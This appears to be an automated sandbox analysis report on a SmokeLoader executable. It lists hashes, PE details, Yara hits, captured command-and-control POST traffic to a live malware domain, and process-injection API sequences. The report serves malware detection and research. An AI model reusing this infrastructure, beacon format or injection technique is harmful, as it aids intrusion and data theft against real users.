	Hweat0i2VU.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	91.215.85.120
	c2DmniR687.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	91.215.85.120

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	53QoH91Zg3.exe	Get hash	malicious	Unknown	Browse	88.99.2.111
	7GfciIf7ys.exe	Get hash	malicious	Unknown	Browse	213.239.213.220
	2pFytt52ws.exe	Get hash	malicious	Unknown	Browse	95.216.22.24
	53QoH91Zg3.exe	Get hash	malicious	Unknown	Browse	195.201.62.78
	http://manga-netflix10737.tinyblogging.com.xx3.kz/	Get hash	malicious	Unknown	Browse	138.201.139.144
	https://monogogo.info/JQJMLAWN#em=npaladino@bigge.com	Get hash	malicious	Phisher	Browse	46.4.15.55
	http://www.lesliehawes.com	Get hash	malicious	Unknown	Browse	135.181.16.82
	KKveTTgaAAsecNNaaaa.sh4.elf	Get hash	malicious	Unknown	Browse	46.4.110.10
	ExeFile (267).exe	Get hash	malicious	Emotet	Browse	195.201.56.70
	ExeFile (27).exe	Get hash	malicious	AZORult, PureLog Stealer	Browse	168.119.251.131

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	240128
Entropy (8bit):	6.731687145851453
Encrypted:	false
SSDEEP:	3072:R7zwL9yI/sBPRA4QCMTRswzIdIzXLEZGs1LCX3B5MPMbynBDm:9zwLJsBP9QbHznkZFcoP
MD5:	64B4AC441E96D0FCA88FB2A62CC170B0
SHA1:	5D111704BFB4A26778BC5BF7F9E13CDA1A53A767
SHA-256:	CB9D1EBC73719F1434F92E6648B4815C01DADEF4761F7CC4E91561CE34DA6346
SHA-512:	5BEC6DA89297D73E3EC7F53658C2006BA84C22776A8F63D80619B7EBE810BDCCB8C729D6CE688C6AB1B1D61A16DC4E08B390C2D401B1C2B913F5DF3107BEB5E9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76% Antivirus: Virustotal, Detection: 75%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....8.d.................x...........&............@.................................G...........................................d.... ............................................................@...@............................................text....v.......x.................. ..`.rdata..0T.......V...\|..............@..@.data...(%.......R..................@....rsrc....... .......$..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rdihhcd:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.731687145851453
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	br0A8E2X6I.exe
File size:	240'128 bytes
MD5:	64b4ac441e96d0fca88fb2a62cc170b0
SHA1:	5d111704bfb4a26778bc5bf7f9e13cda1a53a767
SHA256:	cb9d1ebc73719f1434f92e6648b4815c01dadef4761f7cc4e91561ce34da6346
SHA512:	5bec6da89297d73e3ec7f53658c2006ba84c22776a8f63d80619b7ebe810bdccb8c729d6ce688c6ab1b1d61a16dc4e08b390c2d401b1c2b913f5df3107beb5e9
SSDEEP:	3072:R7zwL9yI/sBPRA4QCMTRswzIdIzXLEZGs1LCX3B5MPMbynBDm:9zwLJsBP9QbHznkZFcoP
TLSH:	4734BF227AF2D0B1D7AB05700973EFA45F7BB87216B4C17F2368076A5E706D08A5A353
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....8.d...

File Icon


Icon Hash:	454941415145611d

Static PE Info

General

Entrypoint:	0x40268e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x64D6388E [Fri Aug 11 13:33:02 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	eb9aaa0ab1d9686972350806b52b7256

Entrypoint Preview

Instruction
call 00007F8A386D5349h
jmp 00007F8A386CF47Eh
sub eax, 000003A4h
je 00007F8A386CF624h
sub eax, 04h
je 00007F8A386CF619h
sub eax, 0Dh
je 00007F8A386CF60Eh
dec eax
je 00007F8A386CF605h
xor eax, eax
ret
mov eax, 00000404h
ret
mov eax, 00000412h
ret
mov eax, 00000804h
ret
mov eax, 00000411h
ret
mov edi, edi
push esi
push edi
mov esi, eax
push 00000101h
xor edi, edi
lea eax, dword ptr [esi+1Ch]
push edi
push eax
call 00007F8A386D3A77h
xor eax, eax
movzx ecx, ax
mov eax, ecx
mov dword ptr [esi+04h], edi
mov dword ptr [esi+08h], edi
mov dword ptr [esi+0Ch], edi
shl ecx, 10h
or eax, ecx
lea edi, dword ptr [esi+10h]
stosd
stosd
stosd
mov ecx, 0042F030h
add esp, 0Ch
lea eax, dword ptr [esi+1Ch]
sub ecx, esi
mov edi, 00000101h
mov dl, byte ptr [ecx+eax]
mov byte ptr [eax], dl
inc eax
dec edi
jne 00007F8A386CF5F9h
lea eax, dword ptr [esi+0000011Dh]
mov esi, 00000100h
mov dl, byte ptr [eax+ecx]
mov byte ptr [eax], dl
inc eax
dec esi
jne 00007F8A386CF5F9h
pop edi
pop esi
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 0000051Ch
mov eax, dword ptr [0042F680h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
push edi
lea eax, dword ptr [ebp-00000518h]
push eax
push dword ptr [esi+04h]
call dword ptr [004290B8h]
mov edi, 00000100h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2daac	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0x85d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x291f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d340	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x29000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x276b6	0x27800	5db209e803a85c91701ad3f62731d441	False	0.7699886273734177	data	7.422171603883306	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x29000	0x5430	0x5600	660a9620e92219d42d56655718a88cd9	False	0.46184593023255816	OpenPGP Secret Key	5.721873167233637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2f000	0x12528	0x5200	b0614985d36160ae09e7d24167d212c8	False	0.10589748475609756	dBase III DBT, next free block index 7565155	1.2291133318406493	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42000	0x85d8	0x8600	9d0959a1bbde36f620c99cce020e88dc	False	0.4897971082089552	data	4.680321239917704	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x42390	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.5530383795309168
RT_ICON	0x43238	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.5699458483754513
RT_ICON	0x43ae0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.5932080924855492
RT_ICON	0x44048	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.45518672199170124
RT_ICON	0x465f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4540337711069418
RT_ICON	0x47698	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.46024590163934426
RT_ICON	0x48020	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.47429078014184395
RT_STRING	0x48728	0x62c	data	Romanian	Romania	0.4291139240506329
RT_STRING	0x48d58	0x474	data	Romanian	Romania	0.45263157894736844
RT_STRING	0x491d0	0x532	data	Romanian	Romania	0.44586466165413535
RT_STRING	0x49708	0x6c4	data	Romanian	Romania	0.42782909930715934
RT_STRING	0x49dd0	0x5b8	data	Romanian	Romania	0.4275956284153005
RT_STRING	0x4a388	0x24c	data	Romanian	Romania	0.5051020408163265
RT_ACCELERATOR	0x484f0	0x48	data	Romanian	Romania	0.8472222222222222
RT_GROUP_ICON	0x48488	0x68	data	Romanian	Romania	0.6923076923076923
RT_VERSION	0x48538	0x1f0	MS Windows COFF PowerPC object file			0.5282258064516129

Imports

DLL	Import
KERNEL32.dll	GetComputerNameW, GetFileAttributesExA, GetTickCount, FindNextVolumeMountPointA, GetUserDefaultLangID, AssignProcessToJobObject, GetSystemPowerStatus, VerifyVersionInfoA, GetModuleFileNameW, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, GetProcAddress, VirtualAlloc, SetVolumeLabelW, LoadLibraryA, WriteConsoleA, AddConsoleAliasW, MoveFileA, GetNumberFormatW, RemoveDirectoryW, QueryDosDeviceW, GlobalFindAtomW, EnumResourceTypesW, CreateWaitableTimerW, GetConsoleTitleW, VirtualProtect, CompareStringA, DeleteFileW, GetCurrentProcessId, GetFileInformationByHandle, UnregisterWaitEx, GetVolumeInformationW, CreateFileA, LocalAlloc, SetComputerNameW, SetStdHandle, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapFree, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, RaiseException, RtlUnwind, HeapAlloc, HeapReAlloc, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, GetConsoleOutputCP
USER32.dll	SetMenu
GDI32.dll	GetCharABCWidthsFloatW
WINHTTP.dll	WinHttpReadData

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-21T07:11:30.506045+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49711	80	192.168.2.5	188.40.141.211
2024-08-21T07:11:30.260968+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49711	80	192.168.2.5	188.40.141.211

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 21, 2024 07:11:29.618721962 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:11:29.623701096 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:11:29.623792887 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:11:29.623975992 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:11:29.624001026 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:11:29.628813982 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:11:29.628909111 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:11:30.255297899 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:11:30.260967970 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:11:30.261007071 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:11:30.266244888 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:11:30.266457081 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:11:30.450603008 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:11:30.506045103 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:12:46.255522013 CEST	80	49711	188.40.141.211	192.168.2.5
Aug 21, 2024 07:12:46.255759001 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:12:46.255970001 CEST	49711	80	192.168.2.5	188.40.141.211
Aug 21, 2024 07:12:46.260725021 CEST	80	49711	188.40.141.211	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 21, 2024 07:11:29.294415951 CEST	64404	53	192.168.2.5	1.1.1.1
Aug 21, 2024 07:11:29.617777109 CEST	53	64404	1.1.1.1	192.168.2.5
Aug 21, 2024 07:11:52.698153019 CEST	53	54607	162.159.36.2	192.168.2.5
Aug 21, 2024 07:11:53.154598951 CEST	53	57730	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 21, 2024 07:11:29.294415951 CEST	192.168.2.5	1.1.1.1	0xf85b	Standard query (0)	selebration17io.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 21, 2024 07:11:29.617777109 CEST	1.1.1.1	192.168.2.5	0xf85b	No error (0)	selebration17io.io		188.40.141.211	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jynwoplqqkht.com

selebration17io.io

smiodprqlvtv.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	188.40.141.211	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 21, 2024 07:11:29.623975992 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jynwoplqqkht.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 235 Host: selebration17io.io
Aug 21, 2024 07:11:29.624001026 CEST	235	OUT	Data Raw: 48 9d 89 cc 48 67 59 50 58 70 55 55 78 a8 53 be 5c 6d 9e 66 ff 1e ad af b6 19 ab f7 0b f2 d6 97 fc aa 81 b1 72 32 e5 c4 a7 5b 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8b a4 20 f1 Data Ascii: HHgYPXpUUxS\mfr2[ju".B;}f=B!bO !~%UuW]XP3[w\w7f-zb67IgQ%B<#[w&QCwf-4F!?2MV<D,DNqs$-gcY+,
Aug 21, 2024 07:11:30.255297899 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Content-Length: 7 Content-Type: application/octet-stream Date: Wed, 21 Aug 2024 05:11:30 GMT Data Raw: 03 00 00 00 1f 3d 19 Data Ascii: =
Aug 21, 2024 07:11:30.260967970 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://smiodprqlvtv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: selebration17io.io
Aug 21, 2024 07:11:30.261007071 CEST	316	OUT	Data Raw: 48 9d 89 cc 48 67 59 50 58 70 55 55 78 a8 53 be 5c 6d 9e 66 ff 1e ad af b6 19 ab f7 0b f2 d6 97 fc aa 81 b1 72 32 e5 c4 a7 5b 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 c8 8a 14 62 cd d6 4f 96 ef fb 3d c2 Data Ascii: HHgYPXpUUxS\mfr2[ju".B;}f=B!bO=w%$NjgA_7q51u#O<lzV46jW)v&JyOR-o4?-=F=\RW@a~7V)ar
Aug 21, 2024 07:11:30.450603008 CEST	144	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Content-Length: 0 Content-Type: application/octet-stream Date: Wed, 21 Aug 2024 05:11:30 GMT

Target ID:	0
Start time:	01:11:03
Start date:	21/08/2024
Path:	C:\Users\user\Desktop\br0A8E2X6I.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\br0A8E2X6I.exe"
Imagebase:	0x400000
File size:	240'128 bytes
MD5 hash:	64B4AC441E96D0FCA88FB2A62CC170B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2097732029.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:11:09
Start date:	21/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	33.3%
Signature Coverage:	59.5%
Total number of Nodes:	84
Total number of Limit Nodes:	3

Executed Functions

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66

Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25

Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25

Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24

Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64

Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

